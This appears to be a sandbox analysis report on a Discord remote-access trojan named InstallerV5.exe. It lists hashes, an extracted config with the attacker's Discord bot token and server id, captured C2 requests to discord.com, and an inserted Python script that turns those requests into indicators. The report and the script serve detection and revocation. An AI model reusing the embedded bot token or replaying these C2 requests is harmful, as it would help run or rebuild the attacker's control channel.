Analysis
max time kernel: 94s
max time network: 130s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/07/2024, 15:32 UTC
Behavioral tasks
behavioral1: InstallerV5.exe on win7-20240708-en
behavioral2: InstallerV5.exe on win10v2004-20240709-en
General
Target: InstallerV5.exe
Size: 78KB
MD5: b61d469cf77f2dd30e1ef31acba14fc3
SHA1: e1931cb1d20128df56ddfff69f84c5c1ed2975a7
SHA256: 574c5d147be871088a39dcf2dc54bf123f74da56ed2a44613e8e643e2d247ac0
SHA512: bfee99acb08c57615d6bae9eee7bc331eecc82fee81fa09469fe7e891779cfda34860aacba77baa8c15482141169d366713ed4d6108990d4f553ac0734e256b1
SSDEEP: 1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+K8PIC:5Zv5PDwbjNrmAE+KwIC
Malware Config
Extracted: discordrat
discord_token: MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU
server_id: 1257772717743276134
Signatures
Discord RAT
A RAT written in C# using Discord as a C2.
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow 4: discord.com
flow 6: discord.com
Suspicious use of AdjustPrivilegeToken (1 IoC)
Token: SeDebugPrivilege, pid 3912, process InstallerV5.exe
Processes
Network
-
Remote address: 8.8.8.8:53
Request: gateway.discord.gg IN A
Response: gateway.discord.gg IN A 162.159.136.234, 162.159.133.234, 162.159.134.234, 162.159.135.234, 162.159.130.234
-
Remote address: 162.159.136.234:443
Request:
GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: uRyzKI1ml22OdbG7cd3c9w==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg
Response:
HTTP/1.1 101 Switching Protocols
Connection: upgrade
sec-websocket-accept: JZ7lNvll4IIDoJ+K3jGQCEvC5Vs=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9er0rwkDwhWORge0oijz4ROuaXwaXJaY89XfdstZUXwyc4zG9D6mcq1LpkRyZWRI354F2t6GrOuWu7G8I9NJV9LUulfeDTBMuVjdYd1vFoUZz%2BbwXuWoQcEptdlbJQE9brVMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8a2216824b1871b6-LHR
-
Remote address: 8.8.8.8:53
Request: 8.8.8.8.in-addr.arpa IN PTR
Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
-
Remote address: 8.8.8.8:53
Request: discord.com IN A
Response: discord.com IN A 162.159.135.232, 162.159.138.232, 162.159.137.232, 162.159.128.233, 162.159.136.232
-
Remote address: 162.159.135.232:443
Request:
POST /api/v9/guilds/1257772717743276134/channels HTTP/1.1
authorization: Bot MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive
Response:
HTTP/1.1 403 Forbidden
Content-Type: application/json
Content-Length: 49
Connection: keep-alive
set-cookie: __dcfduid=fe1715d6406311ef951c9e4f562a3599; Expires=Wed, 11-Jul-2029 15:32:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1999
x-ratelimit-reset: 1720884768.046
x-ratelimit-reset-after: 86400.000
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVusaJAh7GPOgJZqZyJON44Jor8YoAzfxqE0mOhzPJTtF0CS8vdbfJquHFrM0fSETEcQxoDqdKhWm4XT4Zb9DnNClZYDtb%2Bn1Ha5XgLmYp0pTPj9NoYTm4esgp0V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fe1715d6406311ef951c9e4f562a35996dfd10070d53c1347146f0d5d5bd50bf6592cf2eefcd903ceae23bbf1ae2c725; Expires=Wed, 11-Jul-2029 15:32:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=24e5d3d92705ef92c37cee156496c5241a868b58-1720798368; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=MgXI1qPltG8nP0Cy6g_fxooPwwWNPSA4a7CtgqjFs1w-1720798368109-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8a2216875bcf76f9-LHR
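Added example (not tria.ge's code and not code from the sample): the two requests captured above, the WebSocket handshake to gateway.discord.gg and the bot-authenticated POST to discord.com, turned into structured IoCs and cross-checked against the config block extracted from the binary. The request strings are constructed sample input copied from this report with the headers trimmed to what the parser needs. It relies on two documented facts about Discord: the first dot-separated segment of a bot token is the bot's user id in unpadded base64, and the upper bits of any Discord snowflake are milliseconds since 2015-01-01T00:00:00Z, which gives you the bot's creation time. The misspelled query key in the gateway handshake is recorded verbatim as a fingerprint because that is what the sample sent.

```python
"""Structured Discord-RAT IoCs from captured HTTP request text.

Added example, not tria.ge code. Sample input below is constructed from the
requests shown in this report (headers trimmed).
"""
import base64
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1_420_070_400_000  # Discord snowflake epoch, 2015-01-01T00:00:00Z

# Constructed sample input: the two requests as captured above.
GATEWAY_REQUEST = (
    "GET /?v=9&encording=json HTTP/1.1\r\n"
    "Connection: Upgrade,Keep-Alive\r\n"
    "Upgrade: websocket\r\n"
    "Host: gateway.discord.gg\r\n\r\n"
)
API_REQUEST = (
    "POST /api/v9/guilds/1257772717743276134/channels HTTP/1.1\r\n"
    "authorization: Bot MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY."
    "fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"
    "Host: discord.com\r\n\r\n"
)
# The config block the sandbox extracted statically (copied from the report).
EXTRACTED_CONFIG = {
    "discord_token": "MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU",
    "server_id": "1257772717743276134",
}

TOKEN_RE = re.compile(
    r"^authorization:\s*Bot\s+([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)
GUILD_RE = re.compile(r"^[A-Z]+\s+/api/v\d+/guilds/(\d{17,20})(?:/|\s)", re.MULTILINE)
GATEWAY_RE = re.compile(r"^GET\s+/\?v=\d+&(\w+)=json\s+HTTP/1\.1", re.MULTILINE)
HOST_RE = re.compile(r"^Host:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def bot_id_from_token(token: str) -> int:
    """First dot-separated segment of a bot token is the bot's user id,
    base64url-encoded without padding."""
    first = token.split(".", 1)[0]
    first += "=" * (-len(first) % 4)
    return int(base64.urlsafe_b64decode(first).decode("ascii"))


def snowflake_created_at(snowflake: int) -> str:
    """Bits 22 and up of a Discord snowflake are ms since DISCORD_EPOCH_MS;
    returns the creation time as an ISO-8601 UTC string (second resolution)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms // 1000, tz=timezone.utc).isoformat()


def extract_iocs(requests):
    """Walk raw HTTP request texts and collect the Discord C2 indicators."""
    iocs = {
        "hosts": set(),
        "bot_tokens": set(),
        "bot_ids": set(),
        "guild_ids": set(),
        "gateway_query_keys": [],  # literal key the sample used in the handshake
    }
    for text in requests:
        iocs["hosts"].update(h.lower() for h in HOST_RE.findall(text))
        for token in TOKEN_RE.findall(text):
            iocs["bot_tokens"].add(token)
            iocs["bot_ids"].add(bot_id_from_token(token))
        iocs["guild_ids"].update(int(g) for g in GUILD_RE.findall(text))
        iocs["gateway_query_keys"].extend(GATEWAY_RE.findall(text))
    return iocs


def config_matches_traffic(config, iocs) -> bool:
    """True when the statically extracted token and server_id are the ones the
    sample actually used on the wire; a mismatch means either the extractor or
    the sample's runtime configuration needs a second look."""
    return (
        config["discord_token"] in iocs["bot_tokens"]
        and int(config["server_id"]) in iocs["guild_ids"]
    )


if __name__ == "__main__":
    found = extract_iocs([GATEWAY_REQUEST, API_REQUEST])
    for bot_id in sorted(found["bot_ids"]):
        print(f"bot user id {bot_id} created {snowflake_created_at(bot_id)}")
    print("guilds:", sorted(found["guild_ids"]), "hosts:", sorted(found["hosts"]))
    print("gateway query key(s):", found["gateway_query_keys"])
    print("config matches traffic:", config_matches_traffic(EXTRACTED_CONFIG, found))
```

Two things worth checking on any Discord-C2 report with this script in hand. First, the guild id in the POST path should equal the extracted server_id and the token in the authorization header should equal the extracted discord_token; here both match, so the static config is what actually ran. Second, read the API status code: Discord answers an invalid or revoked token with 401, so the 403 on the channel-create call above (with x-ratelimit-* headers, meaning the request reached the real route) shows the token was accepted as a credential and only the action was refused. At capture time the token was live, which makes it the indicator to report for revocation rather than the Cloudflare-fronted IPs, which are shared with legitimate Discord traffic.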
-
Remote address: 8.8.8.8:53
Request: 234.136.159.162.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 138.32.126.40.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 232.135.159.162.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 240.221.184.93.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 26.165.165.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 198.187.3.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 107.12.20.2.in-addr.arpa IN PTR
Response: 107.12.20.2.in-addr.arpa IN PTR a2-20-12-107.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 11.227.111.52.in-addr.arpa IN PTR
Response: (empty)
-
Flow summary (bytes sent / received, packets sent / received)

162.159.136.234:443 (address taken from the gateway request above)
  2.0kB / 19.8kB, 25 / 30 packets
  HTTP request:  GET https://gateway.discord.gg/?v=9&encording=json
  HTTP response: 101

162.159.135.232:443  https://discord.com/api/v9/guilds/1257772717743276134/channels  tls, http  InstallerV5.exe
  1.1kB / 5.0kB, 10 / 11 packets
  HTTP request:  POST https://discord.com/api/v9/guilds/1257772717743276134/channels
  HTTP response: 403

DNS (all to 8.8.8.8:53)
  gateway.discord.gg            A    64 B / 144 B, 1 / 1  -> 162.159.136.234, 162.159.133.234, 162.159.134.234, 162.159.135.234, 162.159.130.234
  8.8.8.8.in-addr.arpa          PTR  66 B / 90 B, 1 / 1
  discord.com                   A    57 B / 137 B, 1 / 1  -> 162.159.135.232, 162.159.138.232, 162.159.137.232, 162.159.128.233, 162.159.136.232
  234.136.159.162.in-addr.arpa  PTR  74 B / 136 B, 1 / 1
  138.32.126.40.in-addr.arpa    PTR  72 B / 158 B, 1 / 1
  232.135.159.162.in-addr.arpa  PTR  74 B / 136 B, 1 / 1
  240.221.184.93.in-addr.arpa   PTR  73 B / 144 B, 1 / 1
  26.165.165.52.in-addr.arpa    PTR  72 B / 146 B, 1 / 1
  198.187.3.20.in-addr.arpa     PTR  71 B / 157 B, 1 / 1
  107.12.20.2.in-addr.arpa      PTR  70 B / 133 B, 1 / 1
  11.227.111.52.in-addr.arpa    PTR  72 B / 158 B, 1 / 1